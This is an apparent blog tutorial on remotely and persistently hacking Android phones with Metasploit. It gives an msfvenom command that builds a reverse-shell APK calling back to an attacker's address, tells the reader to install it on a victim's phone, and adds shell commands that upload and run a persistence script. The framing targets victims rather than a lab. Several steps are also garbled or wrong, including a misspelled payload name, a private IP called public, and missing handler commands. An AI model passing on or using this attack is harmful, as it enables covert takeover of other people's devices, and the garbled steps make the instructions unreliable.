Fellow Hackers and Pentester's welcome to our official Blog Website. 





If you are searching about how to hack Android remotely or permanently then you got that. 


Hi my name is Stephin and today in this post i will teach something special. Because today we are going to hack Android for permanently with MetaSploit Framework and also i will tell you what is MetaSploit, How dose it works, and How we can make Trojan for hacking Android. So without any further delay let get start.


What is MetaSploit? 

MetaSploit is an open source attack framework first developed by H. D. Moore in 2003. MetaSploit made and for hacking into system for Penetration testing purpose. MetaSploit provides usful information to people, who perform penetration testing, IDS signature development, and exploit research. 

How dose it works? 

Metasploit has the frame work and basically It's Ruby code under the hood. You can Write modules that allow you to take advantage of that vulnerability and exploit it using the frame work. Trying to trigger some vulnerability so that you can develope a exploit module around that for example. 

How we can hack Android by using Metasploit Framework? 

first of open your terminal and install Metasploit framework. if you don’t know how to install Metasploit then you can watch our practical video on it.  


• requirements 

> 1GB Storage 
> 800 MB

recommendation

> install metasploit with high speed internet. 

Note : when you install metasploit. it will take more than 15 minutes.


After install metasploit, open your terminal and type 

> msfconsole  (wait some moment)

When your metasploit will open. Now create a payload by typing

> ruby msfvenom -p android/meterpreter/revers_tcp LHOST=192.168.102.128 LPORT=4444 -o /sdcard/payload.apk   

• LHOST 192.168.102.128 means your public IP

After that open a new session and type > msfconsole  when it’s open type following this commands

After doing this now install that payload on your victims phone. After install it click on to open.

 Note : payload will not open


Now you will got meterpreter session. But this is not permanent. Let's make it permanent type

 > ls
 > cd /sdcard
 > ls

 we need to remove nothing.sh file so type

 > rm nothing.sh
 >ls

 Successfully removed.

 Now you have to upload this nothing.sh file. Download from here
 > nothing.sh

After download this file you need to upload this file on your victims phone. for this process just type

 > upload /(here your downloaded nothing.sh file path)
> ls

 as you will see It's successfully uploaded. Now follow this commands

> shell
> sh nothing.sh

 Now you have all set. Now you can hack it easily. if you didn’t understand then you can download and watch a practical video on it.

Practical Video Download

I hope you are you enjoy this tutorial. if you enjoy this tutorial then please share this post and Follow us on YouTube By Subscribeing our YouTube Channel.

 >> SUBSCRIBE NOW <<

 Don't Forgot to follow me on Instagram
 >> Instagram <<

 Thank you so much for staying with us. See you in next amazing hacks.